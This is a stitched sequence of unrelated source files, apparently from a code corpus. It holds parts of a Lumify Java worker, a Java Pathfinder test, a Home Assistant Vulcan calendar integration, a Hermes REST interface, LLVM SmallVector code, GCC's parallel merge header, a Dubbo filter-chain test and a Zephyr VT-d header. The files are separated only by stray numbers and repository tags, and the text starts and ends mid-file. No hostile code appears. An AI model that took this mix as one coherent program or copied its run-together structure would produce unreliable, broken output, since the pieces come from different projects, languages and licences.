                LOGGER.debug("interested worker for element %s property %s: %s", element.getId(), propertyText, interestedWorkerWrapper.getWorker().getClass().getName());
            }
        }
        GraphPropertyWorkData workData = new GraphPropertyWorkData(visibilityTranslator, element, property, workspaceId, visibilitySource);
        LOGGER.debug("Begin work on element %s property %s", element.getId(), propertyText);
        if (property != null && property.getValue() instanceof StreamingPropertyValue) {
            StreamingPropertyValue spb = (StreamingPropertyValue) property.getValue();
            safeExecuteStreamingPropertyValue(interestedWorkerWrappers, workData, spb);
        } else {
            safeExecuteNonStreamingProperty(interestedWorkerWrappers, workData);
        }
        this.graph.flush();
        LOGGER.debug("Completed work on %s", propertyText);
    }
    // Runs each interested worker inline (no stream to share).
    private void safeExecuteNonStreamingProperty(List<GraphPropertyThreadedWrapper> interestedWorkerWrappers, GraphPropertyWorkData workData) throws Exception {
        for (GraphPropertyThreadedWrapper interestedWorkerWrapper : interestedWorkerWrappers) {
            interestedWorkerWrapper.getWorker().execute(null, workData);
        }
    }
    // Fans one input stream out to every interested worker via TeeInputStream.
    // If any worker needs a local file, the stream is first spooled to a temp
    // file (deleted in the finally block).
    private void safeExecuteStreamingPropertyValue(List<GraphPropertyThreadedWrapper> interestedWorkerWrappers, GraphPropertyWorkData workData, StreamingPropertyValue streamingPropertyValue) throws Exception {
        String[] workerNames = graphPropertyThreadedWrapperToNames(interestedWorkerWrappers);
        InputStream in = streamingPropertyValue.getInputStream();
        File tempFile = null;
        try {
            boolean requiresLocalFile = isLocalFileRequired(interestedWorkerWrappers);
            if (requiresLocalFile) {
                tempFile = copyToTempFile(in, workData);
                in = new FileInputStream(tempFile);
            }
            TeeInputStream teeInputStream = new TeeInputStream(in, workerNames);
            for (int i = 0; i < interestedWorkerWrappers.size(); i++) {
                interestedWorkerWrappers.get(i).enqueueWork(teeInputStream.getTees()[i], workData);
            }
            teeInputStream.loopUntilTeesAreClosed();
            for (GraphPropertyThreadedWrapper interestedWorkerWrapper : interestedWorkerWrappers) {
                interestedWorkerWrapper.dequeueResult();
            }
        } finally {
            if (tempFile != null) {
                if (!tempFile.delete()) {
                    LOGGER.warn("Could not delete temp file %s", tempFile.getAbsolutePath());
                }
            }
        }
    }
    // Spools the stream to a temp file (named after the element's file
    // extension, defaulting to "data") and records it on the work data.
    private File copyToTempFile(InputStream in, GraphPropertyWorkData workData) throws IOException {
        String fileExt = LumifyProperties.FILE_NAME_EXTENSION.getPropertyValue(workData.getElement());
        if (fileExt == null) {
            fileExt = "data";
        }
        File tempFile = File.createTempFile("graphPropertyBolt", fileExt);
        workData.setLocalFile(tempFile);
        try (OutputStream tempFileOut = new FileOutputStream(tempFile)) {
            IOUtils.copy(in, tempFileOut);
        } finally {
            in.close();
        }
        return tempFile;
    }
    // True if any interested worker declares that it needs a local file.
    private boolean isLocalFileRequired(List<GraphPropertyThreadedWrapper> interestedWorkerWrappers) {
        for (GraphPropertyThreadedWrapper worker : interestedWorkerWrappers) {
            if (worker.getWorker().isLocalFileRequired()) {
                return true;
            }
        }
        return false;
    }
    // Filters workers by the element's white/black list properties, then by
    // each worker's own isHandled() check.  An empty white list means "all".
    private List<GraphPropertyThreadedWrapper> findInterestedWorkers(Element element, Property property) {
        Set<String> graphPropertyWorkerWhiteList = IterableUtils.toSet(LumifyProperties.GRAPH_PROPERTY_WORKER_WHITE_LIST.getPropertyValues(element));
        Set<String> graphPropertyWorkerBlackList = IterableUtils.toSet(LumifyProperties.GRAPH_PROPERTY_WORKER_BLACK_LIST.getPropertyValues(element));
        List<GraphPropertyThreadedWrapper> interestedWorkers = new ArrayList<>();
        for (GraphPropertyThreadedWrapper wrapper : workerWrappers) {
            String graphPropertyWorkerName = wrapper.getWorker().getClass().getName();
            if (graphPropertyWorkerWhiteList.size() > 0 && !graphPropertyWorkerWhiteList.contains(graphPropertyWorkerName)) {
                continue;
            }
            if (graphPropertyWorkerBlackList.contains(graphPropertyWorkerName)) {
                continue;
            }
            if (wrapper.getWorker().isHandled(element, property)) {
                interestedWorkers.add(wrapper);
            }
        }
        return interestedWorkers;
    }
    // Class names of the wrapped workers, used to label the tee streams.
    private String[] graphPropertyThreadedWrapperToNames(List<GraphPropertyThreadedWrapper> interestedWorkerWrappers) {
        String[] names = new String[interestedWorkerWrappers.size()];
        for (int i = 0; i < names.length; i++) {
            names[i] = interestedWorkerWrappers.get(i).getWorker().getClass().getName();
        }
        return names;
    }
    /** Stops every worker thread started by prepareWorkers(). */
    public void shutdown() {
        for (GraphPropertyThreadedWrapper wrapper : this.workerWrappers) {
            wrapper.stop();
        }
    }
    @Inject
    public void setUserRepository(UserRepository userRepository) {
        this.userRepository = userRepository;
    }
    @Inject
    public void setGraph(Graph graph) {
        this.graph = graph;
    }
    @Inject
    public void setConfiguration(Configuration configuration) {
        this.configuration = configuration;
    }
    @Inject
    public void setWorkQueueRepository(WorkQueueRepository workQueueRepository) {
        this.workQueueRepository = workQueueRepository;
    }
    @Inject
    public void setVisibilityTranslator(VisibilityTranslator visibilityTranslator) {
        this.visibilityTranslator = visibilityTranslator;
    }
    /**
     * Main loop: polls the spout for tuples, processes each one, and acks or
     * fails it on the spout.  Sleeps 100ms when the queue is empty; runs until
     * stop() is called.
     */
    public void run() throws Exception {
        WorkerSpout workerSpout = prepareGraphPropertyWorkerSpout();
        shouldRun = true;
        while (shouldRun) {
            GraphPropertyWorkerTuple tuple = (GraphPropertyWorkerTuple) workerSpout.nextTuple();
            if (tuple == null) {
                Thread.sleep(100);
                continue;
            }
            try {
                process(tuple.getJson());
                workerSpout.ack(tuple.getMessageId());
            } catch (Throwable ex) {
                LOGGER.error("Could not process tuple: %s", tuple, ex);
                workerSpout.fail(tuple.getMessageId());
            }
        }
    }
    /** Requests the run() loop to exit after the current iteration. */
    public void stop() {
        shouldRun = false;
    }
    // Creates and opens the spout that feeds the run() loop.
    protected WorkerSpout prepareGraphPropertyWorkerSpout() {
        WorkerSpout spout = workQueueRepository.createWorkerSpout();
        spout.open();
        return spout;
    }
}
| 5,833
|
387
|
<reponame>Jaikishan-Saroj-786/jpf-core<gh_stars>100-1000
/*
* Copyright (C) 2014, United States Government, as represented by the
* Administrator of the National Aeronautics and Space Administration.
* All rights reserved.
*
* The Java Pathfinder core (jpf-core) platform is licensed under the
* Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0.
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package gov.nasa.jpf.test.vm.basic;
import gov.nasa.jpf.util.test.TestJPF;
import gov.nasa.jpf.vm.ClassInfo;
import gov.nasa.jpf.vm.ClassLoaderInfo;
import org.junit.Test;
/*
* VM.registerStartupClass must be kept in sync with ClassInfo.registerClass.
* This test ensures that the interfaces of the main class are registered
* properly. The old VM.registerStartupClass code wasn't initializing the
* class object of the interfaces.
*/
public class InitializeInterfaceClassObjectRefTest extends TestJPF implements InitializeInterfaceClassObjectRefTestInterface
{
    @Test
    public void test()
    {
        // verifyUnhandledExceptionDetails() returns true when executing natively
        // (it then launches JPF on this test); inside JPF it returns false and
        // the else branch runs under the model checker.
        if (verifyUnhandledExceptionDetails(RuntimeException.class.getName(), "This test throws an expected exception.", "+log.finest+=,gov.nasa.jpf.vm.ClassInfo"))
        {
            // Throw an exception to avoid backtracking. Backtracking will wipe out the class object ref.
            throw new RuntimeException("This test throws an expected exception.");
        }
        else
        {
            // Running under JPF: the interface of the main class must have been
            // registered at startup with a valid java.lang.Class object ref.
            ClassInfo ci = ClassLoaderInfo.getCurrentResolvedClassInfo( InitializeInterfaceClassObjectRefTestInterface.class.getName());
            if (ci.getClassObjectRef() < 0)
                throw new AssertionError("ci.getClassObjectRef() < 0 : " + ci.getClassObjectRef());
        }
    }
}
// Marker interface implemented by the test's main class; its class object must
// be initialized during VM startup, which is what the test verifies.
interface InitializeInterfaceClassObjectRefTestInterface
{
}
| 686
|
30,023
|
<reponame>liangleslie/core
"""Support for Vulcan Calendar platform."""
from __future__ import annotations
from datetime import date, datetime, timedelta
import logging
from aiohttp import ClientConnectorError
from vulcan import UnauthorizedCertificateException
from homeassistant.components.calendar import (
ENTITY_ID_FORMAT,
CalendarEntity,
CalendarEvent,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryAuthFailed
from homeassistant.helpers.device_registry import DeviceEntryType
from homeassistant.helpers.entity import generate_entity_id
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from . import DOMAIN
from .fetch_data import get_lessons, get_student_info
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
    hass: HomeAssistant,
    config_entry: ConfigEntry,
    async_add_entities: AddEntitiesCallback,
) -> None:
    """Set up the calendar platform for entity."""
    client = hass.data[DOMAIN][config_entry.entry_id]
    # Fetch the student once; the entity id and display data both derive from it.
    student_info = await get_student_info(
        client, config_entry.data.get("student_id")
    )
    data = {"student_info": student_info}
    entity_id = generate_entity_id(
        ENTITY_ID_FORMAT,
        f"vulcan_calendar_{student_info['full_name']}",
        hass=hass,
    )
    async_add_entities([VulcanCalendarEntity(client, data, entity_id)])
class VulcanCalendarEntity(CalendarEntity):
    """A calendar entity exposing one Vulcan student's lesson schedule."""

    def __init__(self, client, data, entity_id) -> None:
        """Create the Calendar entity."""
        self.student_info = data["student_info"]
        self._event: CalendarEvent | None = None
        self.client = client
        self.entity_id = entity_id
        self._unique_id = f"vulcan_calendar_{self.student_info['id']}"
        self._attr_name = f"Vulcan calendar - {self.student_info['full_name']}"
        self._attr_unique_id = f"vulcan_calendar_{self.student_info['id']}"
        # One service "device" per student, grouping this calendar with the
        # student's other Vulcan entities in the device registry.
        self._attr_device_info = {
            "identifiers": {(DOMAIN, f"calendar_{self.student_info['id']}")},
            "entry_type": DeviceEntryType.SERVICE,
            "name": f"{self.student_info['full_name']}: Calendar",
            "model": f"{self.student_info['full_name']} - {self.student_info['class']} {self.student_info['school']}",
            "manufacturer": "Uonet +",
            "configuration_url": f"https://uonetplus.vulcan.net.pl/{self.student_info['symbol']}",
        }

    @property
    def event(self) -> CalendarEvent | None:
        """Return the next upcoming event."""
        return self._event

    async def async_get_events(self, hass, start_date, end_date) -> list[CalendarEvent]:
        """Get all events in a specific time frame."""
        try:
            events = await get_lessons(
                self.client,
                date_from=start_date,
                date_to=end_date,
            )
        except UnauthorizedCertificateException as err:
            # Certificate no longer accepted: trigger Home Assistant's re-auth flow.
            raise ConfigEntryAuthFailed(
                "The certificate is not authorized, please authorize integration again"
            ) from err
        except ClientConnectorError as err:
            # Network problem: warn only while still marked available (avoids log
            # spam) and fall back to an empty lesson list.
            if self.available:
                _LOGGER.warning(
                    "Connection error - please check your internet connection: %s", err
                )
            events = []
        event_list = []
        for item in events:
            # Map a Vulcan lesson dict onto a Home Assistant CalendarEvent.
            event = CalendarEvent(
                start=datetime.combine(item["date"], item["time"].from_),
                end=datetime.combine(item["date"], item["time"].to),
                summary=item["lesson"],
                location=item["room"],
                description=item["teacher"],
            )
            event_list.append(event)
        return event_list

    async def async_update(self) -> None:
        """Get the latest data."""
        try:
            events = await get_lessons(self.client)
            if not self.available:
                _LOGGER.info("Restored connection with API")
                self._attr_available = True
            if events == []:
                # No lessons today; look ahead one week for the next one.
                events = await get_lessons(
                    self.client,
                    date_to=date.today() + timedelta(days=7),
                )
                if events == []:
                    # Nothing upcoming at all.
                    self._event = None
                    return
        except UnauthorizedCertificateException as err:
            raise ConfigEntryAuthFailed(
                "The certificate is not authorized, please authorize integration again"
            ) from err
        except ClientConnectorError as err:
            # Flip availability off once; keep the previous event until the
            # connection recovers.
            if self.available:
                _LOGGER.warning(
                    "Connection error - please check your internet connection: %s", err
                )
                self._attr_available = False
            return
        # Pick the lesson closest to now, preferring ones that have not ended
        # yet (False sorts before True in the key tuple).
        new_event = min(
            events,
            key=lambda d: (
                datetime.combine(d["date"], d["time"].to) < datetime.now(),
                abs(datetime.combine(d["date"], d["time"].to) - datetime.now()),
            ),
        )
        self._event = CalendarEvent(
            start=datetime.combine(new_event["date"], new_event["time"].from_),
            end=datetime.combine(new_event["date"], new_event["time"].to),
            summary=new_event["lesson"],
            location=new_event["room"],
            description=new_event["teacher"],
        )
| 2,568
|
707
|
<filename>wpiutil/src/main/native/cpp/llvm/SmallVector.cpp
//===- llvm/ADT/SmallVector.cpp - 'Normally small' vectors ----------------===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
//
// This file implements the SmallVector class.
//
//===----------------------------------------------------------------------===//
#include "wpi/SmallVector.h"
#include "wpi/MemAlloc.h"
using namespace wpi;
/// grow_pod - This is an implementation of the grow() method which only works
/// on POD-like datatypes and is out of line to reduce code duplication.
void SmallVectorBase::grow_pod(void *FirstEl, size_t MinCapacity,
                               size_t TSize) {
  // Ensure we can fit the new capacity in 32 bits.
  if (MinCapacity > UINT32_MAX)
    report_bad_alloc_error("SmallVector capacity overflow during allocation");
  // At least double; the +1 guarantees progress even when capacity() is 0.
  size_t NewCapacity = 2 * capacity() + 1; // Always grow.
  // Clamp into [MinCapacity, UINT32_MAX] (Capacity is stored as 32 bits).
  NewCapacity =
      std::min(std::max(NewCapacity, MinCapacity), size_t(UINT32_MAX));
  void *NewElts;
  if (BeginX == FirstEl) {
    // Still using the inline buffer (BeginX points at the first inline
    // element): move to heap storage.
    NewElts = safe_malloc(NewCapacity * TSize);
    // Copy the elements over. No need to run dtors on PODs.
    memcpy(NewElts, this->BeginX, size() * TSize);
  } else {
    // If this wasn't grown from the inline copy, grow the allocated space.
    NewElts = safe_realloc(this->BeginX, NewCapacity * TSize);
  }
  this->BeginX = NewElts;
  this->Capacity = NewCapacity;
}
| 532
|
743
|
<reponame>althink/hermes<filename>hermes-api/src/main/java/pl/allegro/tech/hermes/api/endpoints/ModeEndpoint.java<gh_stars>100-1000
package pl.allegro.tech.hermes.api.endpoints;
import javax.ws.rs.GET;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.QueryParam;
import javax.ws.rs.core.Response;
import static javax.ws.rs.core.MediaType.APPLICATION_JSON;
@Path("mode")
public interface ModeEndpoint {
    /**
     * Returns the current mode as a JSON-encoded string.
     */
    @GET
    @Produces(APPLICATION_JSON)
    String getMode();

    /**
     * Sets the mode.
     *
     * @param mode the new mode, passed as the {@code mode} query parameter
     * @return HTTP response describing the outcome
     */
    @POST
    @Produces(APPLICATION_JSON)
    Response setMode(@QueryParam("mode") String mode);
}
| 253
|
2,151
|
<filename>third_party_toolchains/gcc_arm_none_eabi/arm-none-eabi/include/c++/4.9.3/parallel/merge.h
// -*- C++ -*-
// Copyright (C) 2007-2014 Free Software Foundation, Inc.
//
// This file is part of the GNU ISO C++ Library. This library is free
// software; you can redistribute it and/or modify it under the terms
// of the GNU General Public License as published by the Free Software
// Foundation; either version 3, or (at your option) any later
// version.
// This library is distributed in the hope that it will be useful, but
// WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
// General Public License for more details.
// Under Section 7 of GPL version 3, you are granted additional
// permissions described in the GCC Runtime Library Exception, version
// 3.1, as published by the Free Software Foundation.
// You should have received a copy of the GNU General Public License and
// a copy of the GCC Runtime Library Exception along with this program;
// see the files COPYING3 and COPYING.RUNTIME respectively. If not, see
// <http://www.gnu.org/licenses/>.
/** @file parallel/merge.h
* @brief Parallel implementation of std::merge().
* This file is a GNU parallel extension to the Standard C++ Library.
*/
// Written by <NAME>.
#ifndef _GLIBCXX_PARALLEL_MERGE_H
#define _GLIBCXX_PARALLEL_MERGE_H 1
#include <parallel/basic_iterator.h>
#include <bits/stl_algo.h>
namespace __gnu_parallel
{
/** @brief Sequential merge that emits at most @c __max_length of the
 *  smallest elements from two sorted input sequences.
 *
 *  Unlike std::merge(), the @c __begin iterators are passed by reference
 *  and advanced past the consumed elements; they may therefore stop
 *  short of their @c __end.
 *  @param __begin1 Begin iterator of first sequence (advanced).
 *  @param __end1 End iterator of first sequence.
 *  @param __begin2 Begin iterator of second sequence (advanced).
 *  @param __end2 End iterator of second sequence.
 *  @param __target Target begin iterator.
 *  @param __max_length Maximum number of elements to merge.
 *  @param __comp Comparator.
 *  @return Output end iterator. */
template<typename _RAIter1, typename _RAIter2,
         typename _OutputIterator, typename _DifferenceTp,
         typename _Compare>
  _OutputIterator
  __merge_advance_usual(_RAIter1& __begin1, _RAIter1 __end1,
                        _RAIter2& __begin2, _RAIter2 __end2,
                        _OutputIterator __target,
                        _DifferenceTp __max_length, _Compare __comp)
  {
    // Take the smaller head element until one input runs dry or the
    // output quota is exhausted.  Ties favour the first sequence,
    // keeping the merge stable.
    for (; __max_length > 0 && __begin1 != __end1 && __begin2 != __end2;
         --__max_length)
      {
        if (__comp(*__begin2, *__begin1))
          *__target++ = *__begin2++;
        else
          *__target++ = *__begin1++;
      }
    // Bulk-copy the remaining quota from whichever input still has
    // elements (the caller guarantees enough elements overall).
    if (__begin1 != __end1)
      {
        __target = std::copy(__begin1, __begin1 + __max_length, __target);
        __begin1 += __max_length;
      }
    else
      {
        __target = std::copy(__begin2, __begin2 + __max_length, __target);
        __begin2 += __max_length;
      }
    return __target;
  }
/** @brief Merge routine being able to merge only the @c __max_length
 *  smallest elements.
 *
 *  The @c __begin iterators are advanced accordingly, they might not
 *  reach @c __end, in contrast to the usual variant.
 *  Specially designed code should allow the compiler to generate
 *  conditional moves instead of branches.
 *  @param __begin1 Begin iterator of first sequence.
 *  @param __end1 End iterator of first sequence.
 *  @param __begin2 Begin iterator of second sequence.
 *  @param __end2 End iterator of second sequence.
 *  @param __target Target begin iterator.
 *  @param __max_length Maximum number of elements to merge.
 *  @param __comp Comparator.
 *  @return Output end iterator. */
template<typename _RAIter1, typename _RAIter2,
         typename _OutputIterator, typename _DifferenceTp,
         typename _Compare>
  _OutputIterator
  __merge_advance_movc(_RAIter1& __begin1, _RAIter1 __end1,
                       _RAIter2& __begin2, _RAIter2 __end2,
                       _OutputIterator __target,
                       _DifferenceTp __max_length, _Compare __comp)
  {
    typedef _DifferenceTp _DifferenceType;
    typedef typename std::iterator_traits<_RAIter1>::value_type
      _ValueType1;
    typedef typename std::iterator_traits<_RAIter2>::value_type
      _ValueType2;
#if _GLIBCXX_ASSERTIONS
    _GLIBCXX_PARALLEL_ASSERT(__max_length >= 0);
#endif
    while (__begin1 != __end1 && __begin2 != __end2 && __max_length > 0)
      {
        // Pre-compute both successor iterators and load both head values so
        // the selection below is a pair of data moves rather than a branch;
        // the intent is that the compiler emits conditional moves here.
        // Do NOT "simplify" this into the branchy form of the usual variant.
        _RAIter1 __next1 = __begin1 + 1;
        _RAIter2 __next2 = __begin2 + 1;
        _ValueType1 __element1 = *__begin1;
        _ValueType2 __element2 = *__begin2;
        if (__comp(__element2, __element1))
          {
            // Second head is strictly smaller: emit it (ties keep the first
            // sequence's element, preserving stability).
            __element1 = __element2;
            __begin2 = __next2;
          }
        else
          __begin1 = __next1;
        *__target = __element1;
        ++__target;
        --__max_length;
      }
    // One input exhausted (or quota reached): bulk-copy the remaining quota
    // from whichever input still has elements.
    if (__begin1 != __end1)
      {
        __target = std::copy(__begin1, __begin1 + __max_length, __target);
        __begin1 += __max_length;
      }
    else
      {
        __target = std::copy(__begin2, __begin2 + __max_length, __target);
        __begin2 += __max_length;
      }
    return __target;
  }
/** @brief Merge routine being able to merge only the @c __max_length
 *  smallest elements.
 *
 *  The @c __begin iterators are advanced accordingly, they might not
 *  reach @c __end, in contrast to the usual variant.
 *  Intended as a static switch between the plain and the conditional-move
 *  variant; as written it always dispatches to __merge_advance_movc.
 *  @param __begin1 Begin iterator of first sequence.
 *  @param __end1 End iterator of first sequence.
 *  @param __begin2 Begin iterator of second sequence.
 *  @param __end2 End iterator of second sequence.
 *  @param __target Target begin iterator.
 *  @param __max_length Maximum number of elements to merge.
 *  @param __comp Comparator.
 *  @return Output end iterator. */
template<typename _RAIter1, typename _RAIter2,
         typename _OutputIterator, typename _DifferenceTp,
         typename _Compare>
  inline _OutputIterator
  __merge_advance(_RAIter1& __begin1, _RAIter1 __end1,
                  _RAIter2& __begin2, _RAIter2 __end2,
                  _OutputIterator __target, _DifferenceTp __max_length,
                  _Compare __comp)
  {
    // Profiling/trace hook; expands to nothing unless enabled.
    _GLIBCXX_CALL(__max_length)
    return __merge_advance_movc(__begin1, __end1, __begin2, __end2,
                                __target, __max_length, __comp);
  }
/** @brief Merge routine fallback to sequential in case the
 *  iterators of the two input sequences are of different type.
 *
 *  With heterogeneous iterator types the parallel implementation is not
 *  available, so this overload simply delegates to the sequential
 *  __merge_advance.
 *  @param __begin1 Begin iterator of first sequence.
 *  @param __end1 End iterator of first sequence.
 *  @param __begin2 Begin iterator of second sequence.
 *  @param __end2 End iterator of second sequence.
 *  @param __target Target begin iterator.
 *  @param __max_length Maximum number of elements to merge.
 *  @param __comp Comparator.
 *  @return Output end iterator. */
template<typename _RAIter1, typename _RAIter2,
         typename _RAIter3, typename _Compare>
  inline _RAIter3
  __parallel_merge_advance(_RAIter1& __begin1, _RAIter1 __end1,
                           _RAIter2& __begin2,
                           _RAIter2 __end2, _RAIter3 __target, typename
                           std::iterator_traits<_RAIter1>::
                           difference_type __max_length, _Compare __comp)
  { return __merge_advance(__begin1, __end1, __begin2, __end2, __target,
                           __max_length, __comp); }
/** @brief Parallel merge routine being able to merge only the @c
 *  __max_length smallest elements.
 *
 *  The @c __begin iterators are advanced accordingly, they might not
 *  reach @c __end, in contrast to the usual variant.
 *  The functionality is projected onto parallel_multiway_merge over the
 *  two sequences (stable, no sentinels, exact splitting).
 *  @param __begin1 Begin iterator of first sequence.
 *  @param __end1 End iterator of first sequence.
 *  @param __begin2 Begin iterator of second sequence.
 *  @param __end2 End iterator of second sequence.
 *  @param __target Target begin iterator.
 *  @param __max_length Maximum number of elements to merge.
 *  @param __comp Comparator.
 *  @return Output end iterator.
 */
template<typename _RAIter1, typename _RAIter3,
         typename _Compare>
  inline _RAIter3
  __parallel_merge_advance(_RAIter1& __begin1, _RAIter1 __end1,
                           _RAIter1& __begin2, _RAIter1 __end2,
                           _RAIter3 __target, typename
                           std::iterator_traits<_RAIter1>::
                           difference_type __max_length, _Compare __comp)
  {
    typedef typename
        std::iterator_traits<_RAIter1>::value_type _ValueType;
    typedef typename std::iterator_traits<_RAIter1>::
        difference_type _DifferenceType1 /* == difference_type2 */;
    typedef typename std::iterator_traits<_RAIter3>::
        difference_type _DifferenceType3;
    typedef typename std::pair<_RAIter1, _RAIter1>
        _IteratorPair;
    // Package the two ranges as a 2-element sequence array for the
    // multiway merge machinery.
    _IteratorPair __seqs[2] = { std::make_pair(__begin1, __end1),
                                std::make_pair(__begin2, __end2) };
    _RAIter3 __target_end = parallel_multiway_merge
        < /* __stable = */ true, /* __sentinels = */ false>
        (__seqs, __seqs + 2, __target, multiway_merge_exact_splitting
         < /* __stable = */ true, _IteratorPair*,
          _Compare, _DifferenceType1>, __max_length, __comp,
         omp_get_max_threads());
    return __target_end;
  }
} //namespace __gnu_parallel
#endif /* _GLIBCXX_PARALLEL_MERGE_H */
| 3,736
|
18,012
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.dubbo.rpc.cluster.filter;
import org.apache.dubbo.common.URL;
import org.apache.dubbo.rpc.Invocation;
import org.apache.dubbo.rpc.Invoker;
import org.apache.dubbo.rpc.Result;
import org.apache.dubbo.rpc.model.ApplicationModel;
import org.apache.dubbo.rpc.protocol.AbstractInvoker;
import org.junit.jupiter.api.Assertions;
import org.junit.jupiter.api.Test;
import static org.apache.dubbo.common.constants.CommonConstants.CONSUMER;
import static org.apache.dubbo.common.constants.CommonConstants.INTERFACE_KEY;
import static org.apache.dubbo.common.constants.CommonConstants.REFERENCE_FILTER_KEY;
public class DefaultFilterChainBuilderTest {
@Test
public void testBuildInvokerChainForLocalReference() {
DefaultFilterChainBuilder defaultFilterChainBuilder = new DefaultFilterChainBuilder();
// verify that no filter is built by default
URL urlWithoutFilter = URL.valueOf("injvm://127.0.0.1/DemoService")
.addParameter(INTERFACE_KEY, DemoService.class.getName());
urlWithoutFilter = urlWithoutFilter.setScopeModel(ApplicationModel.defaultModel());
AbstractInvoker<DemoService> invokerWithoutFilter = new AbstractInvoker<DemoService>(DemoService.class, urlWithoutFilter) {
@Override
protected Result doInvoke(Invocation invocation) throws Throwable {
return null;
}
};
Invoker<?> invokerAfterBuild = defaultFilterChainBuilder.buildInvokerChain(invokerWithoutFilter, REFERENCE_FILTER_KEY, CONSUMER);
Assertions.assertTrue(invokerAfterBuild instanceof AbstractInvoker);
// verify that if LogFilter is configured, LogFilter should exist in the filter chain
URL urlWithFilter = URL.valueOf("injvm://127.0.0.1/DemoService")
.addParameter(INTERFACE_KEY, DemoService.class.getName())
.addParameter(REFERENCE_FILTER_KEY, "log");
urlWithFilter = urlWithFilter.setScopeModel(ApplicationModel.defaultModel());
AbstractInvoker<DemoService> invokerWithFilter = new AbstractInvoker<DemoService>(DemoService.class, urlWithFilter) {
@Override
protected Result doInvoke(Invocation invocation) throws Throwable {
return null;
}
};
invokerAfterBuild = defaultFilterChainBuilder.buildInvokerChain(invokerWithFilter, REFERENCE_FILTER_KEY, CONSUMER);
Assertions.assertTrue(invokerAfterBuild instanceof FilterChainBuilder.CallbackRegistrationInvoker);
Assertions.assertEquals(1, ((FilterChainBuilder.CallbackRegistrationInvoker<?, ?>) invokerAfterBuild).filters.size());
}
@Test
public void testBuildInvokerChainForRemoteReference() {
DefaultFilterChainBuilder defaultFilterChainBuilder = new DefaultFilterChainBuilder();
// verify that no filter is built by default
URL urlWithoutFilter = URL.valueOf("dubbo://127.0.0.1:20880/DemoService")
.addParameter(INTERFACE_KEY, DemoService.class.getName());
urlWithoutFilter = urlWithoutFilter.setScopeModel(ApplicationModel.defaultModel());
AbstractInvoker<DemoService> invokerWithoutFilter = new AbstractInvoker<DemoService>(DemoService.class, urlWithoutFilter) {
@Override
protected Result doInvoke(Invocation invocation) throws Throwable {
return null;
}
};
Invoker<?> invokerAfterBuild = defaultFilterChainBuilder.buildInvokerChain(invokerWithoutFilter, REFERENCE_FILTER_KEY, CONSUMER);
Assertions.assertTrue(invokerAfterBuild instanceof AbstractInvoker);
// verify that if LogFilter is configured, LogFilter should exist in the filter chain
URL urlWithFilter = URL.valueOf("dubbo://127.0.0.1:20880/DemoService")
.addParameter(INTERFACE_KEY, DemoService.class.getName())
.addParameter(REFERENCE_FILTER_KEY, "log");
urlWithFilter = urlWithFilter.setScopeModel(ApplicationModel.defaultModel());
AbstractInvoker<DemoService> invokerWithFilter = new AbstractInvoker<DemoService>(DemoService.class, urlWithFilter) {
@Override
protected Result doInvoke(Invocation invocation) throws Throwable {
return null;
}
};
invokerAfterBuild = defaultFilterChainBuilder.buildInvokerChain(invokerWithFilter, REFERENCE_FILTER_KEY, CONSUMER);
Assertions.assertTrue(invokerAfterBuild instanceof FilterChainBuilder.CallbackRegistrationInvoker);
}
}
| 1,846
|
6,224
|
<gh_stars>1000+
/*
* Copyright (c) 2020 Intel Corporation
* SPDX-License-Identifier: Apache-2.0
*/
#ifndef ZEPHYR_DRIVERS_INTERRUPT_CONTROLLER_INTC_INTEL_VTD_H_
#define ZEPHYR_DRIVERS_INTERRUPT_CONTROLLER_INTC_INTEL_VTD_H_
#define VTD_INT_SHV BIT(3)
#define VTD_INT_FORMAT BIT(4)
/* We don't care about int_idx[15], since the size is fixed to 256,
* it's always 0
*/
#define VTD_MSI_MAP(int_idx) \
((0x0FEE << 20) | (int_idx << 5) | VTD_INT_SHV | VTD_INT_FORMAT)
/* Interrupt Remapping Table Entry (IRTE) for Remapped Interrupts */
/* 128-bit entry split into the low (l) and high (h) 64-bit halves.
 * Field layout follows the Intel VT-d interrupt-remapping entry format;
 * see the VT-d specification for the precise field semantics.
 */
struct vtd_irte {
	/* Low 64 bits: validity, delivery attributes, vector and destination. */
	struct {
		uint64_t present : 1;
		uint64_t fpd : 1;		/* fault processing disable */
		uint64_t dst_mode : 1;
		uint64_t redirection_hint : 1;
		uint64_t trigger_mode : 1;
		uint64_t delivery_mode : 3;
		uint64_t available : 4;
		uint64_t _reserved_0 : 3;
		uint64_t irte_mode : 1;
		uint64_t vector : 8;
		uint64_t _reserved_1 : 8;
		uint64_t dst_id : 32;
	} l;
	/* High 64 bits: requester (source) identification and validation. */
	struct {
		uint64_t src_id : 16;
		uint64_t src_id_qualifier : 2;
		uint64_t src_validation_type : 2;
		uint64_t _reserved : 44;
	} h;
} __packed;
/* The table must be 4KB aligned, which is exactly 256 entries.
* And since we allow only 256 entries as a maximum: let's align to it.
*/
#define IRTE_NUM 256
#define IRTA_SIZE 7 /* size = 2^(X+1) where IRTA_SIZE is X 2^8 = 256 */
/* Per-controller runtime state: the remapping table itself (256 entries,
 * which also makes it 4KB aligned — see the note above) plus an allocation
 * counter. */
struct vtd_ictl_data {
	struct vtd_irte irte[IRTE_NUM];
